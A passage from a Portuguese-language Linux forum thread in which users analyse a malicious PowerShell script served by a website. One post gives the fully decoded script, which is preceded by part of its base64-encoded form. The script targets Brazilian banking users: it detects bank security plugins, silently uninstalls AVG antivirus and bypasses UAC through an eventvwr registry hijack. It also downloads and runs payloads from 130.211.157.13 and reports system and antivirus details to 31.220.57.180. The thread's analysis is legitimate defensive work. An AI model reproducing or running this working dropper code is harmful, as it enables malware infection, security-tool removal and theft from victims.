BTADEAKwBHAEwAcQBLADgAMQAwACsALwBaAFoAbABFAGYAQwA5AGIAVQBsAFUAagBiADMAdAA0AEsAZwBaAE8AbQB6AEUASABsAHoAMwByAGsAcgB3AC8AbABBAFAAQgBjADcATwBOAGQAVQBlAGEAbQBiAEgAZABRAEcAeAAwAE8ASgBzAGIAWAAvADAAUQBQAHgAZgBYADgAWABWAHUAKwA1AGkAbgBqAGsAbgBnAEcAYgBTAHYASQBDAGwAKwAwADMAVQBOAFMAbAA3AHgAMQBDAGIAQgBIADEAaABxAHkAcABzADUAYgBSAEMAWAA3AHEAcwAwAGUAdQAxAFAALwBaAHgAYQBHAGoASgBDACsAeABRAC8AUQBjAG4ATgB2AEIALwBqAG0ANgBIAHcAUABWAFgATQBFAGMANwBlAEcAMABLADEANwB5AEEANgBzAEIAVwBPADQATgBQAFkAMwAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA
    
";
    
		}
    
		$durl = "http://130.211.157.13/artw/arquivo"
    
		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"
    
		$tudo = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,67,73,77,86,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,42,32,70,82,79,77,32,87,105,110,51,50,95,79,112,101,114,97,116,105,110,103,83,121,115,116,101,109) -join ''));
    
		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();
    
	}
    
}
    
$mtx.ReleaseMutex()
    
$mtx.Dispose()
    
}


    0 0
  • Quote

    • 30. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]

    ANDRE MILKE DOS SANTOS
    andremilke
    (usa Debian)

    Enviado em 25/11/2016 - 12:55h

    Terminei de decriptar a função toda

    
$ie = New-Object -com internetexplorer.application; 
    
$ie.visible = $true; 
    
$ie.navigate("");
    
$mtx = New-Object System.Threading.Mutex($false, "mtt")
    
if ($mtx.WaitOne(500)) {
    
if(-not (Test-Path "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')")){
    
	(Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')"
    
	if(((Get-Culture).Name.ToLower() -eq (pt-Br -join '').ToLower())) {
    
		$dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];
    
		$gbPath = Join-Path $dir (GbPlugin -join '');
    
		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};
    
		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};
    
		$avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join ''));
    
		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 
    
		if($av -like "*avg*"){
    
			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E  $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;
    
$uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;
    

    
foreach($uninstall64 in $uninstall64s) {
    
$uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";
    
$uninstall64 = $uninstall64.Trim();
    
if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64  /qn /norestart" -Wait }};
    
foreach($uninstall32 in $uninstall32s) {
    
$uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";
    
$uninstall32 = $uninstall32.Trim();
    
if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32  /qn /norestart" -Wait }};"';
    
$path = "HKCU:\Software\Classes\mscfile\shell\open\command";
    
if ((Get-ItemProperty -Path $path -Name "(default)" -ErrorAction SilentlyContinue) -eq $null){	
    
New-Item $path -Force |	 New-ItemProperty -Name "(Default)" -Value $command -PropertyType string -Force | Out-Null }
    
else{exit};
    
$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath("System")) -ChildPath "eventvwr.exe";
    
Start-Process -FilePath $eventvwrPath;
    
Start-Sleep -Seconds 5;
    
$mscfilePath = "HKCU:\Software\Classes\mscfile"; 
    
if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait;
    
			while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}
    
		}
    
		$ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;
    
		if(Test-Path $(Join-Path $dir (WinRAR -join ''))){
    
			$wr = (.:Winrar-join '')
    
		}
    
		if($v1) {
    
			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"
    
			$ll = "COF267F9415EF3518C.cab"
    
			$output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll;
    
			(New-Object System.Net.WebClient).DownloadFile($durl, $output);
    
			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 	$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';
    
																										$command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd;
    
																										$path = (HKCU:\Software\Classes\mscfile\shell\open\command -join '');
    
																										if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){	
    
																										New-Item $path -Force |	 New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null }
    
																										else{exit};
    
																										$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join '');
    
																										Start-Process -FilePath $eventvwrPath;
    
																										Start-Sleep -Seconds 5;
    
																										$mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); 
    
																										if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};
    
																										";
    
		}
    
		$durl = "http://130.211.157.13/artw/arquivo"
    
		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"
    
		$tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join ''));
    
		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();
    
	}
    
}
    
$mtx.ReleaseMutex()
    
$mtx.Dispose()
    
}




    0 0
  • Quote

    • 31. Re: Site vivaolinux solicitando download de arquivo [RESOLVIDO]

    Perfil removido
    removido
    (usa Nenhuma)

    Enviado em 25/11/2016 - 15:37h

    Já viram a localização dos ips que aparece no arquivo?

    http://130.211.157.13

    http://31.220.57.180



    Me lembrei de uma palestra que tive na faculdade sobre PowerShell para Linux.

    https://azure.microsoft.com/pt-br/blog/powershell-is-open-sourced-and-is-available-on-linux/

    Cuidado para quem tem o PowerShell instalado mesmo que o arquivo seja feito para Windows aparentemente.


    1 0
  • Quote


    • 01 02 03



    Patrocínio

    Site hospedado pelo provedor RedeHost.
    Linux banner

    Destaques

    Artigos

    Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota

    Configuração para desligamento automatizado de Computadores em um Ambiente Comercial

    O mínimo que você precisa saber sobre o terminal (parte 2)

    O mínimo que você precisa saber sobre o terminal (parte 1)

    Como iniciar uma máquina virtual do VirtualBox automaticamente no boot do LUbuntu 18 LTS

    Dicas

    Mudar o gerenciador de login (GDM para SDDM e vice-versa) - parte 2

    Como deixar as abas do Firefox mais fininhas

    Mudar o gerenciador de login (GDM para SDDM)

    "Tentando" fazer com que programas rodem no Wayland e no X11

    Saiu o Gnome 47 sem muito alarde com mais do mesmo

    Tópicos

    Porblema com MergeList [RESOLVIDO] (10)

    Melhor hospedagem em nuvem para projetos Laravel com baixo custo? [RES... (7)

    Falha ao carregar drivers (1)

    Como baixar os drivers de áudio no linux mint? (7)

    Como posso localizar o arquivo HTML da página inicial do GLPI dentro d... (2)

    Top 10 do mês

    Scripts

    [Python] Automação de scan de vulnerabilidades

    [Python] Script para analise de superficie de ataque

    [Shell Script] Novo script para redimensionar, rotacionar, converter e espelhar arquivos de imagem

    [Shell Script] Iniciador de DOOM (DSDA-DOOM, Doom Retro ou Woof!)

    [Shell Script] Script para adicionar bordas às imagens de uma pasta

    A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

    Site hospedado por: